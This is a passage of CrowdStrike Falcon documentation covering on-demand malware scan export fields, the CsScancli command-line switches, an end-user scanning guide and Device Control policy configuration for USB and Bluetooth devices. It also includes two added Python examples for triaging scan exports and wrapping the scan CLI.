  • JSON

  • CSV

metadata.filecount.malicious

The number of malicious files found during the scan. For more info, see Limitations and considerations.

  • Immediate scans

  • JSON

  • CSV

metadata.filecount.quarantined

The number of files quarantined during the scan

  • Immediate scans

  • JSON

  • CSV

metadata.filecount.traversed

The total number of files traversed during the scan

  • Immediate scans

  • JSON

  • CSV

metadata.filecount.skipped

The number of files skipped during the scan because they weren’t supported file types

  • Immediate scans

  • JSON

  • CSV

metadata.status

The current status of the scan. For more info, see On-demand scan status values.

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

metadata.started_on

The date and time when the scan began, in each host’s local time zone

  • Immediate scans

  • JSON

  • CSV

metadata.completed_on

The date and time when the scan completed, in each host’s local time zone

  • Immediate scans

  • JSON

  • CSV

metadata.last_updated

The date and time when the scan was last updated

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

status

The overall status rolled up from the status of each host in the metadata

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

host

The list of hosts to be scanned, as defined during scan creation

  • Immediate scans

  • CSV

host_groups

The list of host groups to be scanned, as defined during scan creation

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

endpoint_notification

Indicates whether end-user notifications are enabled or disabled for the scan. For more info, see End-user notifications.

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

pause_duration

The maximum time that a user-initiated scan can remain paused before it automatically resumes

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

max_duration

The maximum time that can elapse before a scan automatically stops. A value of 0 indicates an unlimited duration.

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

sensor_ml_level_detection

The sensor ML detection level for the scan

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

sensor_ml_level_prevention

The sensor ML prevention level for quarantining files during the scan

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

cloud_ml_level_detection

The cloud ML detection level for the scan

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

cloud_ml_level_prevention

The cloud ML prevention level for quarantining files during the scan

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

severity

The highest severity level of all malicious files found when scanning all of the hosts for this scan

  • Immediate scans

  • JSON

  • CSV

schedule.start_timestamp

The scheduled start time for the scan

  • Scheduled scans

  • CSV

schedule.interval

The specified time interval between recurring scheduled scans

  • Scheduled scans

  • CSV

scan_started_on

The date and time when the scan started on the first host

  • Immediate scans

  • JSON

  • CSV

scan_completed_on

The date and time when the scan completed on all hosts

  • Immediate scans

  • JSON

  • CSV

created_by

The name of the Falcon user who created the scan

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

created_on

The date and time when the scan was created

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

last_updated

The date and time when the scan was last updated

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

deleted

Indicates whether the scan was deleted

  • Scheduled scans

  • JSON

  • CSV
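As an added example (not CrowdStrike code), a small triage pass over a JSON export of immediate scans that uses the field names listed above; the record layout, the ISO 8601 UTC timestamp format and the unit of max_duration (hours) are assumptions about the export, and the sample records are constructed.

```python
"""Triage a JSON export of Falcon on-demand immediate scans.

Added example, not CrowdStrike code. It uses the export field names from
the reference above; the record layout (a JSON array of objects), the
timestamp format (ISO 8601 UTC with a Z suffix) and the unit of
max_duration (hours) are assumptions, not documented facts.
"""
import json
from datetime import datetime, timezone

# Assumed ranking of the 'severity' field; an empty string means no
# malicious file was found on any host in the scan.
SEVERITY_RANK = {"critical": 4, "high": 3, "medium": 2, "low": 1, "": 0}

# Constructed sample export (three immediate scans), not real data.
SAMPLE_EXPORT = json.dumps([
    {
        "host": ["WS-0142"],
        "host_groups": ["Finance"],
        "endpoint_notification": True,
        "pause_duration": 2,
        "max_duration": 1,
        "severity": "high",
        "scan_started_on": "2024-03-01T09:00:00Z",
        "scan_completed_on": "2024-03-01T10:02:00Z",
        "created_by": "analyst@example.com",
    },
    {
        "host": ["WS-0077", "WS-0078"],
        "host_groups": [],
        "endpoint_notification": False,
        "pause_duration": 2,
        "max_duration": 0,
        "severity": "",
        "scan_started_on": "2024-03-01T11:00:00Z",
        "scan_completed_on": "2024-03-01T11:20:00Z",
        "created_by": "analyst@example.com",
    },
    {
        "host": [],
        "host_groups": ["Engineering"],
        "endpoint_notification": True,
        "pause_duration": 2,
        "max_duration": 4,
        "severity": "medium",
        "scan_started_on": "2024-03-01T12:00:00Z",
        "scan_completed_on": "2024-03-01T12:45:00Z",
        "created_by": "soc-lead@example.com",
    },
])


def parse_ts(value):
    """Parse an ISO 8601 UTC timestamp such as 2024-03-01T09:00:00Z."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def hit_max_duration(scan):
    """True when the scan ran for at least max_duration hours.

    A max_duration of 0 means unlimited, so such scans never hit the limit.
    A scan that ran up to the limit was stopped by the platform rather than
    finishing, so its result may not cover every host.
    """
    limit_hours = scan.get("max_duration", 0)
    if not limit_hours:
        return False
    elapsed = parse_ts(scan["scan_completed_on"]) - parse_ts(scan["scan_started_on"])
    return elapsed.total_seconds() >= limit_hours * 3600


def triage(export_json):
    """Return one finding per scan, most severe first.

    Each finding carries the scan's target (explicit hosts or host groups),
    whether malicious files were found, and whether the time limit was hit.
    """
    findings = []
    for scan in json.loads(export_json):
        target = scan.get("host") or scan.get("host_groups") or ["(none)"]
        severity = scan.get("severity") or ""
        findings.append({
            "target": target,
            "severity": severity,
            "malicious_found": SEVERITY_RANK.get(severity, 0) > 0,
            "hit_max_duration": hit_max_duration(scan),
            "created_by": scan.get("created_by", ""),
        })
    # Python's sort is stable, so ties keep export order.
    findings.sort(key=lambda f: SEVERITY_RANK.get(f["severity"], 0), reverse=True)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EXPORT):
        flags = []
        if f["malicious_found"]:
            flags.append(f"severity={f['severity']}")
        if f["hit_max_duration"]:
            flags.append("stopped by max_duration")
        print(", ".join(f["target"]), "->", "; ".join(flags) or "clean")
```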

On-demand scanning CLI

The on-demand scanning CLI can be invoked on the local host to initiate scans and view scan results.

Invoke the on-demand scanning CLI on the local host, separating folders with backslashes:

"C:\Program Files\Crowdstrike\CsScancli.exe" <switch>=[params]

Important: Separate folders with backslashes, not forward slashes. Because the installation path contains a space, quote the path to the executable as shown.

Parameter                   Description
--scan={path}               Scan the specified file or folder.
--scan-system-drive         Scan the system drive.
--scan-all-drives           Scan all drives.
--quarantine={true/false}   Used with --scan commands. Enable or disable file quarantining during scanning.
--stop                      Stop the active scan.
--pause                     Pause scanning.
--resume                    Resume scanning.
--status={ID}               Optional. Specify a scan ID to get the scan status. To get the statuses of all scans, omit this parameter.

Example command:

"C:\Program Files\Crowdstrike\CsScancli.exe" --status

Note: Falcon sensor for Windows version 7.01 and later uses UTC time in its output.
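An added example (not CrowdStrike code) of driving the CLI from a script: it uses only the switches in the table above and the executable path given there, normalizes path separators as the Important note requires, and refuses UNC paths because network locations are not scanned. The CLI's exit codes and output format are not documented on this page, so the wrapper returns them raw.

```python
"""Wrapper for the on-demand scanning CLI (CsScancli.exe).

Added example, not CrowdStrike code. It uses only the switches in the
table above and the executable path given there. The CLI's exit codes and
output format are not documented on this page, so the wrapper returns the
raw return code and text for the caller to interpret.
"""
import subprocess

CSSCANCLI = r"C:\Program Files\Crowdstrike\CsScancli.exe"


def normalize_scan_path(path):
    """Rewrite forward slashes as backslashes, which the CLI requires."""
    return str(path).replace("/", "\\")


def is_local_path(win_path):
    """Reject UNC paths: network locations are skipped by the scanner.

    A drive letter mapped to a network share cannot be told apart from a
    local drive by its spelling, so only the UNC form is caught here.
    """
    return not win_path.startswith("\\\\")


def build_scan_args(path, quarantine=False):
    """Argument list for --scan.

    Passing a list to subprocess means the space in 'Program Files' needs
    no manual quoting, unlike the shell form of the command.
    """
    win_path = normalize_scan_path(path)
    if not is_local_path(win_path):
        raise ValueError(f"network path is not scanned by on-demand scanning: {win_path}")
    return [
        CSSCANCLI,
        f"--scan={win_path}",
        f"--quarantine={'true' if quarantine else 'false'}",
    ]


def build_status_args(scan_id=None):
    """Argument list for --status; omit the ID to list every scan."""
    switch = "--status" if scan_id is None else f"--status={scan_id}"
    return [CSSCANCLI, switch]


def run_cli(args):
    """Run the CLI and return (return_code, combined_output).

    Output timestamps are UTC on Falcon sensor for Windows 7.01 and later.
    """
    completed = subprocess.run(args, capture_output=True, text=True, check=False)
    return completed.returncode, completed.stdout + completed.stderr


if __name__ == "__main__":
    # Scan a downloads folder without quarantining, then list scan statuses.
    code, out = run_cli(build_scan_args("C:/Users/alice/Downloads", quarantine=False))
    print(f"scan launch returned {code}\n{out}")
    code, out = run_cli(build_status_args())
    print(f"status returned {code}\n{out}")
```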

CrowdStrike Falcon Malware Scanning User Guide

A guide that you can provide to end users who want to run CrowdStrike Falcon malware scans on their local Windows computers.

CrowdStrike Falcon Malware Scanning User Guide

This guide is for end users who want to run CrowdStrike Falcon malware scans on their local Windows computers.

Understanding CrowdStrike Falcon malware scanning

CrowdStrike Falcon malware scanning can detect and quarantine portable executable (PE) files that contain dormant malware before they execute.

When you initiate a CrowdStrike Falcon malware scan, it runs immediately on your local Windows computer. For example, you might want to run a malware scan after you’ve downloaded new files on your computer, or when you’ve noticed unusual behavior on your computer.

You can run a scan on a selected file or folder, the full system drive, or all drives on your computer. Subfolders are automatically included in scans.

Only PE files, such as .exe and .dll files, can be scanned. Additionally, only files saved locally are scanned. Examples of scannable files include files on your computer’s hard drive, or files on a USB storage device or SAN drive that’s attached to your computer. Network drives, mapped network shares, and cloud storage drives are skipped during scanning.

Depending on how your CrowdStrike Falcon administrator has configured scanning, scans might also be initiated by your administrator or through an automated trigger. For example, a scan might automatically start whenever you insert a USB storage device into your computer.

Depending on how your CrowdStrike Falcon administrator has configured scanning, temporary status notifications might appear during and after the scanning process.

Quarantined files

Depending on how your CrowdStrike Falcon administrator has configured scanning, malicious files might be quarantined during a scan.

Files that were quarantined from a USB device and then subsequently released by your administrator are added to C:\ProgramData\CrowdStrike on your computer.

Running and managing scans

Get to the CrowdStrike Falcon malware scanning menu

The CrowdStrike Falcon malware scanning menu is where you can start, pause, resume, or stop a scan, and where you can view the results of a scan. The available menu selections vary depending on the context and status of a scan.

  • On your local computer, right-click your Windows desktop or a specific file or folder, and then select CrowdStrike Falcon malware scan. A menu shows the available scanning options.

Scan a specific file or folder

Initiate a CrowdStrike Falcon malware scan of a specific file or folder on your local computer.

  • On your local computer, right-click the file or folder that you want to scan, and then select CrowdStrike Falcon malware scan > Scan. The scan begins running.

For info about viewing scan results, see Viewing scan status and results.

Scan the full system drive

Initiate a CrowdStrike Falcon malware scan of the full system drive (for example, the C: drive) on your local computer.

  • On your local computer, right-click the Windows desktop, and then select CrowdStrike Falcon malware scan > Scan system drive. The scan begins running.

For info about viewing scan results, see Viewing scan status and results.

Scan all local drives

Initiate a CrowdStrike Falcon malware scan of all drives on your local computer.

  • On your local computer, right-click the Windows desktop, and then select CrowdStrike Falcon malware scan > Scan all drives. The scan begins running.

For info about viewing scan results, see Viewing scan status and results.

Pause or resume a scan

Pause or resume a currently running scan that was initiated by your CrowdStrike Falcon administrator or by another method.

Note: If your CrowdStrike Falcon administrator configured a maximum pause duration, the scan automatically resumes after the maximum pause time has elapsed.
  • On your local computer, right-click the Windows desktop, and then select CrowdStrike Falcon malware scan (in progress) > Pause scan or CrowdStrike Falcon malware scan (in progress) > Resume scan.

Stop a scan

Stop a scan that you initiated before it finishes running. You cannot restart a stopped scan.

Note: You can stop scans that you initiated. However, you cannot stop scans that were initiated by your CrowdStrike Falcon administrator or by another method.
  • On your local computer, right-click the Windows desktop, and then select CrowdStrike Falcon malware scan (in progress) > Stop scan. The scan stops running.

Viewing scan status and results

View scan status

Depending on how your CrowdStrike Falcon administrator has configured scanning, temporary status notifications might appear during and after the scanning process.

View scan results

View the results of CrowdStrike Falcon malware scans that have run on your local computer, including info about any files that were quarantined. For more info about quarantined files, see Quarantined files.

Scan results are purged after your computer reboots.

Because not all file types are scanned, the reported number of files scanned might differ from the total file count in the scan results.

  • On the local computer, right-click the Windows desktop, and then select CrowdStrike Falcon malware scan > See results of last scan. The scan results appear.

CrowdStrike Falcon malware scanning field reference

These fields might appear when you’re viewing scan status notifications or scan results. The exact fields shown depend on the specific notification or scan type.

Field Description

Scan ID

The unique identifier for the scan

Status

The current status of the scan

Initiated from

The event or entity that triggered the scan

Start time

The date and time when the scan started, in the local computer’s time zone

End time

The date and time when the scan stopped, in the local computer’s time zone

Scanned files

The total number of portable executable files that were scanned

Note: Only PE files, such as .exe and .dll files, are scanned.

Traversed files

The total number of files that were traversed in the specified file paths, including files that were skipped during scanning

Unsupported files

The number of files that were traversed but not scanned

Total seen files

The total number of files in the selected folders or drives, including scanned files, unsupported files that were skipped, and files that were explicitly excluded from scanning by your Falcon administrator

Suspicious file count

The number of scanned PE files that contained malware

Root scan path

The top-level path that was scanned

Suspicious files

The path for each scanned file that contained malware

Device Control, Firewall Management, and ZTA

Device Control

Create USB device policies to gain visibility into and control over USB devices in your environment.

Overview

Device Control provides visibility as well as blocking and granular control over supported removable device and Bluetooth device connections in your network. Create policies to gain visibility into and control over these devices in your environment.

  • Configure policies to control which USB devices and internal SD card readers can connect to your Windows and Mac hosts.
  • Configure policies to control which Bluetooth and Thunderbolt mass storage devices can connect to your Mac hosts.
  • Fine-tune your policies with exceptions for USB and Bluetooth devices.
  • Customize end-user notifications.
  • Review Device Control dashboards to see supported device connections, device policy violations, and actions taken automatically by your policies.

Device Control is an add-on module for Falcon Insight XDR, Falcon Prevent, or Falcon Pro subscriptions.

Configure Device Control policies to improve your organization’s security posture:

  • Apply policies to all devices and hosts and set up exceptions to allow select devices on select hosts.
  • Grant individual device permissions that range from fully blocking devices to allowing complete functionality.
  • Configure policies to monitor when you only want to collect data, configure them to enforce when you’re ready for them to take action.
  • Customize the notification that a user sees when a supported removable or Bluetooth device is blocked or given restricted access.

After you’ve configured your policies and assigned them to hosts, you can monitor supported removable and Bluetooth device connections in the Falcon console. Each time a device attempts to connect to a host, the Falcon sensor logs an event that contains information about the connection attempt.

Review device connection activity and events to understand how these devices are used in your organization and fine-tune your Device Control policy settings and exceptions over time to meet your organization’s specific needs.

Requirements

Subscriptions: Falcon Device Control

Sensor support: All supported versions of the Falcon sensor for Windows and macOS

Operating system requirements: Device Control supports all Falcon-supported OSes for Windows and macOS

Reboot requirements:

  • Windows: Hosts must be rebooted after initially enabling Device Control
  • macOS: No reboot requirement

Roles:

  • Users with these roles can manage USB device policies:
    • Falcon Administrator
    • Device Control Manager
  • Users with these roles can view device connections:
    • Falcon Security Lead
    • Falcon Investigator
    • Falcon Analyst

Permissions required for custom roles: All permissions in the Device Control permission group are required for custom roles to fully manage and view Device Control policies and dashboards.

CrowdStrike Clouds: Available in all clouds

Supported device types

Device Control supports these device types for Windows and Mac:

  • USB devices

  • Internal SD card readers

Device Control supports these device types only for Mac:

  • Bluetooth devices

  • External Thunderbolt mass storage devices

Limitations

Device Control might not function as expected in the following situations.

For macOS and Windows:

  • Unformatted CDs or DVDs that report as Mass Storage devices cannot be blocked using Mass Storage device class settings or exceptions due to a Windows limitation. To block these devices, an Any Class exception containing the CD or DVD's combined ID must be created in the policy, or the CD/DVD must be formatted, after which it can be controlled using Mass Storage policy settings.

For Windows only:

  • For virtual machines (VMs) such as Citrix and VMware, global allowlisting is not supported; as a result, incompatible devices should not be used.
  • Known VID/PID for incompatible devices include (but are not necessarily limited to):
    • 0x19D2 / 0x10D6 ZTE Devices (CD-ROM, 4G Modem)
    • 0x19D2 / 0x1225 ZTE
    • 0x19D2 / 0x1403 ZTE
    • 0x056E / 0x1042 Elecom Numpad M-BL26UBC
    • 0xC1CA / 0x0004 –
    • 0x1FF7 / 0x0F21 CVTE Touchscreen devices (OEM vendor)
    • 0x1FF7 / 0x0F22 CVTE
    • 0x0403 / ( * ) Virtual serial devices using FTDI UART
  • Using Device Control together with Dell Data Protect (DDPE) can cause errors, including BSODs on the host, and is not recommended.
  • For Virtual Desktop Infrastructures (VDIs) such as Citrix Virtual Apps and Desktops and VMware Horizon, compatibility issues can cause errors, including BSODs on the host; as a result, we do not recommend using Device Control on hosts running VDIs.
  • Vodafone network dongles or Elecom numpad devices
    • Device Control does not work on these devices.
  • USB forwarding technologies such as RemoteFx, RDP: To block devices, you must apply USB device policies on the server, not the client.
  • Custom/third party USB device stacks or UAS storage drivers such as ASUS USB 3.0 Boost:
    • USB devices initialized on third-party USB stacks aren't blocked by Device Control.
    • On Windows 7 hosts, Device Control can't block USB 3.0 drives.
    • Device Control doesn’t work correctly when DLP applications are active.
    • DLP Applications such as Digital Guardian will cause Device Control to not function as expected.
  • Windows to Go: Boot disks aren't blocked by Device Control.
  • Bluetooth devices that do not have a USB dongle, such as mice or keyboards, are not supported for Windows.

Before you begin

You should be familiar with these important concepts:

Get started

Out of the box, all host groups are assigned to the default policy, which is initially configured to allow all supported removable and Bluetooth device connections. Create, configure, and assign a collection of Device Control policies to your hosts to block and allow device connections.

Plan and prepare
  • Determine what specific supported removable and Bluetooth device connections need to be allowed on certain hosts in your organization. Identify hosts that should have particularly limited device connection allowances.
  • Assign the Device Control Manager role to additional Falcon users who need to be able to create and configure Device Control policies.
  • Understand the risk of potentially blocking all supported removable and Bluetooth device connections. Device Control grants you flexibility and control to create and configure policies. Be aware that this includes the ability to create and assign policies that could block essential supported removable or Bluetooth device connections. Configuring the default USB, PCIe, and Bluetooth policy settings to Monitor only is a helpful safeguard. This ensures that the catch-all policy for hosts that are not specifically added to any other Device Control policies won’t have any blocking actions taken on them.
  • To apply Bluetooth Device Control policies, end users on Mac hosts must grant permissions to use the Apple Privacy Preferences Policy Control API for Bluetooth plugin on Sonoma and later. When an enabled policy’s Bluetooth mode is set to Monitor only or Monitor and enforce, all users assigned to that policy who have not already granted permissions will receive a pop-up asking for Bluetooth permissions for Falcon. Users must click Allow in order for Falcon to monitor Bluetooth activity and enforce Bluetooth controls. If you use an MDM to manage your Mac hosts, you can grant this permission through the MDM without the need for user input. For more info, see our knowledge article Granting Permission for Bluetooth Device Control Policies with an MDM.
  • Determine whether the default notification message for a blocked or access-restricted device is appropriate for your organization. To set a customized default notification, go to Support and resources > Resources and tools > General settings, click Notifications, and go to the USB and PCIe device control end-user notifications and/or the Bluetooth device control end-user notifications section. You can create a custom notification message for each policy you configure.
  • You can configure up to 1,000 Device Control policies in the Falcon console. If you're using the API, you can request a Device Control policy limit of 5,000. For more info, contact your CrowdStrike account representative.

Default configuration

A policy must be enabled for its settings to take effect on assigned hosts. When a Device Control policy is disabled, hosts adopt the settings and rules from the next policy they are assigned to according to policy precedence.

Throughout Falcon policies, the default policy is the last policy in the order of precedence. It cannot be disabled, and is applied to all hosts that aren’t assigned to another enabled policy. Configure your default policy to be a safe catch-all that you’re comfortable applying to any of your organization’s hosts.

Each host can belong to one or more host groups. Host groups can be assigned one or more policies. With dynamic groups, a newly-installed sensor inherits the relevant groups and applies the policy with highest precedence to the host. This provides the host with its initial policy settings. If a host is not a part of any groups, or its groups have no policies assigned, it is automatically assigned to the default policy.

Windows:

  • Policy mode: Monitor only
  • Device settings: All set to Full access

Mac:

  • Policy mode for USB: Monitor only
  • Policy mode for Bluetooth and PCIe: Off
    Note: Setting the PCIe policy mode to Off is supported only for Falcon sensor for Mac versions 7.33 and later. If you set this mode to Off for sensor versions 7.32 and earlier, those sensors will use the configured USB mode instead.
  • Device settings: All set to Full Access

View Device Control policies

Go to Endpoint security > Device control > Device policies to manage your organization’s Device Control policies.


Configure policy permissions for USB devices

  1. Set the policy mode to one of the following options:

    • Monitor

    • Monitor and Enforce

    • Off (macOS only)

  2. Click any USB device class to configure policy settings for that class:

    • Audio and Video: Includes headsets, microphones, speakers, and webcams.

    • Imaging: Includes digital cameras.

    • Mass Storage: Includes flash drives, hard drives, and SD card readers.

    • Mobile, Media Transfer Protocols (MTP) and Picture Transfer Protocols (PTP): Includes mobile phones and tablets.

    • Printer: Only includes printers.

    • Wireless: Does not include Wi-Fi adapters. Includes Bluetooth devices with a USB dongle, such as mice or keyboards, and Bluetooth devices that are not integrated, such as headphones.

      Note: When a device does not belong to any of the device classes listed above, the device goes into the Any Class class. By default, devices in this class have Full access permissions and are allowed to function. To control the permissions level for such a device, add an exception to the Any Class class for the device. See Device Control policy exceptions.
  3. Select the level of access for devices of that class:

    • Full access (or Read, write and execute, for the Mass Storage class)

    • Full block

    • Read and write only (applies only to the Mass Storage class)

    • Read only (applies only to the Mass Storage class)

  4. Optional. Click Add exception and follow the instructions to add an exception to this policy. See Device Control policy exceptions.

  5. Optional. Click to disable Enhanced file metadata collection.

  6. Optional. Click to disable End-user notifications.

  7. Click Save.

  8. Then click Save to confirm.

Note: Devices with multiple classes are completely blocked when you block any single class, except for Mass Storage which you can control independently. When you block Mass Storage on a printer with both Printer and Mass Storage classes, the printer continues working while still blocking storage functions. Use the Any Class device class to create an exception that controls all of the composite device's functionality.

Assign a Device Control policy to host groups

Assigning a Device Control policy works the same as assigning other types of policies.

  • Windows: Device Control policies take effect when a supported removable device is connected to a host. If a host has devices connected when you assign a policy, those devices aren't affected until the next time they're reconnected or the next time the host reboots.
  • macOS: Device Control policies take effect when a supported removable or Bluetooth device is connected to a host. If a host has devices connected when you assign a policy, the policy will take effect immediately, meaning that if the policy blocks that device, it will be disconnected.

Follow these steps to assign a Device Control policy to a group.

  1. Go to Endpoint security > Device control > Device policies.

  2. Click the policy you want to assign to a group.

  3. Go to the Assigned Host Groups tab.

  4. Click Assign groups to policy.

  5. Select one or more groups.

  6. Click Assign groups.

Test Device Control policies

Device Control testing can be done by using a test group of hosts or configuring Device Control policies to Monitor only, or a combination of the two approaches.

  • If you limit your testing to a test group of hosts, you’ll need to add the rest of your host groups to your Device Control policies as needed.
  • If you perform your testing by configuring your Device Control policies to Monitor only and observing the device connections, going live will involve updating some of your policies to Monitor and enforce as needed.

Device Control policies

The settings within a Device Control policy determine whether a device is allowed to connect to a host.

For USB and Bluetooth devices, you can further refine access based on device class, such as mass storage or audio/video devices. Within each class, you can set exceptions, more specific configurations that override the general policy setting.

At the policy level, Device Control policies have these policy options:

  • Monitor and enforce: Takes action on devices based on your policy settings: blocking or allowing the device connection and displaying default or custom notification messages.
  • Monitor only: Records the device connection and the action defined by your policy setting, but doesn’t enforce restrictions on assigned hosts. This mode is intended to help you test your policy behavior without disrupting users in your environment.
  • Off (macOS only): Has no device visibility, so doesn’t track violations or enforce restrictions.
  • Policy propagation: Users with Falcon Flight Control can enable or disable policy propagation from parent to child CIDs. For more info about Device Control policy propagation, see Device Control policies in multi-CID environments.

Like other Falcon policies, Device Control policies are processed according to precedence (sequential order) on the hosts they’re assigned to, so it’s important to consider this when configuring your organization’s Device Control policies.

Policy precedence determines which policy's settings are applied to a host when the host is a member of more than one policy. Define policies with different precedences to resolve conflicts. Then, when faced with a conflict, the cloud will automatically apply the policy with the higher precedence (1 being higher than 2, which is higher than 3, and so on).

On a host, the policy with the highest ranking precedence (1 being highest) is applied and active. If something changes with that highest-ranking policy, for example if it gets disabled, then the next highest-ranking policy gets applied and becomes active.

Tip: For info about how policies work, including host group assignment and policy precedence, see Policies in Falcon.

Manage Device Control policies

Go to Endpoint security > Device control > Device policies to manage your organization’s Device Control policies. From here, you can enable, disable, duplicate, or delete a policy.

Note: Use the platform dropdown selector to toggle between Windows or Mac policies.

Change Device Control policy precedence

Follow these steps to reorder Device Control policy precedence.

  1. Go to Endpoint security > Device control > Device policies.

  2. Click Edit precedence.

  3. To reorder the policies, use the arrows in the precedence column to drag a policy up or down.

  4. Click Save.

Enable a policy

Follow these steps to enable a policy.

  1. Go to Endpoint security > Device control > Device policies.

  2. Click to open the policy.
  3. Click to select Enable policy.
  4. Then click Enable policy to confirm.

Duplicate a policy

Follow these steps to duplicate a policy.

  1. Go to Endpoint security > Device control > Device policies.

  2. Click to open the policy.
  3. Click Duplicate policy.
  4. Enter a new name and description, if desired, then click Duplicate to confirm.

The new copy opens immediately.

Edit a policy

Follow these steps to edit a Device Control policy.

  1. Go to Endpoint security > Device control > Device policies.

  2. Click to open the policy you want to edit.
  3. Edit the policy settings and exceptions.
  4. Click Save then click Save again to confirm.

Disable a policy

Follow these steps to disable a Device Control policy.

  1. Go to Endpoint security > Device control > Device policies.

  2. Click to open the policy you want to disable.
  3. If the policy is enabled, click Disable policy.
  4. Then click Disable policy to confirm.

Delete a policy

Follow these steps to delete a policy.

  1. Go to Endpoint security > Device control > Device policies.

  2. Click to open the policy you want to delete.
  3. If the policy is enabled, click Disable policy.
  4. Then click Disable policy to confirm.
  5. Click Delete policy.
  6. Then click Delete policy to confirm.

Device Control policies in multi-CID environments

If you use Falcon Flight Control, Device Control policies that you create in the parent CID are available for use globally in all child CIDs. In a child CID, you can choose which host groups are assigned to an inherited policy. Inherited Device Control policies are labeled with Global Admin on the Device policies page.

You can enable or disable policy propagation from parent to child CIDs from within a policy. Select the Policy propagation checkbox under Setting name to enable or disable this feature.

Considerations:

  • Aside from host group assignment, inherited policies can’t be modified in a child CID. However, you can duplicate policies inherited from the parent and then modify them as needed.

  • Device Control policies that are created in a child CID are fully managed in the child CID. These local policies don’t appear in the parent CID.

  • Locally created policies always have a higher precedence than inherited policies.

  • While you can manage Device Control policies for child CIDs from a parent CID, viewing child Device Control activity from a parent is not supported.

For more info about Falcon Flight Control, see Falcon Flight Control and Multi-CID Support.

Device Control policy settings

When you create a Device Control policy, you set broad rules that allow, block, or restrict devices. For USB or Bluetooth devices, you can specify the action to take based on their device class.

For example, you might create a policy to block USB mass storage drives, but permit access for other classes of USB devices. Or you might create a policy that allows some Bluetooth devices such as keyboards or headphones to connect to your network, but blocks other Bluetooth devices like printers or scanners. To create more specific rules for USB devices, see Device Control policy exceptions for guidance on refining the broad rules defined by a policy.

Integrated Bluetooth devices that do not connect using a USB dongle are only supported for Mac hosts. Bluetooth devices that use a USB dongle, such as mice or keyboards, are supported for both Windows and Mac hosts under the Wireless USB device class.
Note: Blocking isn’t supported for AirDrop devices because the protocol uses both Bluetooth and Wi-Fi. Low Energy (LE) devices, such as some earbuds, are also unsupported.

If a host moves from a group with Bluetooth device settings in place to a group that hasn’t configured Bluetooth device settings, it retains the previous settings. To avoid this, configure Bluetooth device settings for all Device Control policies that a host group may use.

Configure USB Device Control settings

When you create a USB device policy, you set broad rules that allow or block USB devices based on their USB device class. For example, you might create a policy to block USB storage drives, but permit access for other classes of USB devices.

  1. Go to Endpoint security > Device control > Device policies.

  2. Click Create policy.
  3. Enter a name and optional description for your policy.
  4. Click Create policy.
  5. On the Settings tab, select the USB mode to use.
  6. To include USB devices in the policy, enable the USB settings you want to apply.
    1. Optional. Click to enable Enhanced file metadata collection. This setting also applies to PCIe devices.
    2. Optional. Click to enable End-user notifications.
    3. Select the notification to show end users when the USB device is fully blocked.
    4. Select the notification to show end users when the USB device is restricted. This setting also applies to PCIe devices.
      Note: You can customize the message displayed for fully blocked and/or restricted devices. USB and PCIe mass storage full blocks will show the Access Restricted notification rather than the Full Block notification due to the way that full blocks are enforced for the Mass Storage device class.
  7. Go to the USB devices tab.
  8. To select the USB device classes to include in the policy, go to the USB devices tab.
    1. Click to view each class you want to include.
    2. Choose the permission level for each device class.
    3. Optional. To add one or more exceptions for a device class, click Add exception. For more information, see Configure an exception for a USB device class.
  9. Click Save then click Save again to confirm.
  10. Go to the Assigned host groups tab and click Assign host groups to policy. For instructions, see Assign a Device Control policy to host groups.
  11. After you’ve completed configuration, click Enable policy.
    Tip: To expedite configuration of similar policies, click Duplicate policy to create an exact copy. Then open the copy, and edit the name, settings, permission levels, and exceptions as needed.

File Types and Execution

When the Mass Storage permission for a USB device is set to Read and write only, non-executable file types such as batch or .msi files still run. These files call to OS components like cmd.exe and msiexec.exe, which aren’t controlled by Device Control.

Block USB devices with multiple or composite classes

Some USB devices, such as multi-function printers, have multiple or composite classes. Depending on the specific classes, you can disable some or all of the device's functionality.

  • If a multiple-class device has mass storage, set it to Full Block to block only the storage component of the device. Other functions of the device continue to work normally. For example, if your policy blocks mass storage for a multi-function printer, the printer can't use its SD card storage, but it can continue to print normally.

  • If a multiple-class device doesn't have mass storage, blocking any of the device's classes completely prevents connections for that device. For example, if your policy blocks audio or video for a USB camera that also has the imaging class, the camera can't connect using USB in any way.

Configure Bluetooth Device Control settings
Note: This is only available for Mac.
  1. Go to Endpoint security > Device control > Device policies.

  2. Toggle to view Mac policies.
  3. Click Create policy.
  4. Enter a name and optional description for your policy.
  5. Click Create policy.
  6. On the Settings tab, select the Bluetooth mode to use.
  7. To include Bluetooth devices in the policy, enable the Bluetooth settings you want to apply.
    1. Optional. Click to enable End-user notifications.
    2. Select the notification to show end users when the Bluetooth device is fully blocked.
  8. To select the Bluetooth device classes to include in the policy, go to the Bluetooth devices tab.
    1. Click to view each class you want to include.
    2. Choose the permission level for each device class.
      Note: When you choose Specify minor classes, the section expands to show a list of device types within that class. From there you can select to allow or block each device type specifically.
    3. Optional. To add one or more exceptions for a device class, click Add exception. For more information, see Configure an exception for a Bluetooth device class.
    4. Optional. To block all other Bluetooth device types that are not explicitly included in the policy, select Full block under the Other device class.
  9. Click Save then click Save again to confirm.
  10. Go to the Assigned host groups tab and click Assign host groups to policy. For instructions, see Assign a Device Control policy to host groups.
  11. After you’ve completed configuration, click Enable policy.
    Tip: To expedite configuration of similar policies, click Duplicate policy to create an exact copy. Then open the copy, and edit the name, settings, permission levels, and exceptions as needed.
Full Disk Access is not enabled (macOS)

When Full Disk Access (FDA) is not enabled, Device Control policies will not behave as expected. For example, if you have full block enabled, you’ll still be able to access external devices because the external device isn’t blocked as intended. For information about the macOS sensor and FDA, see Falcon Sensor for Mac Deployment.

Internal card reader returns multiple events (macOS)

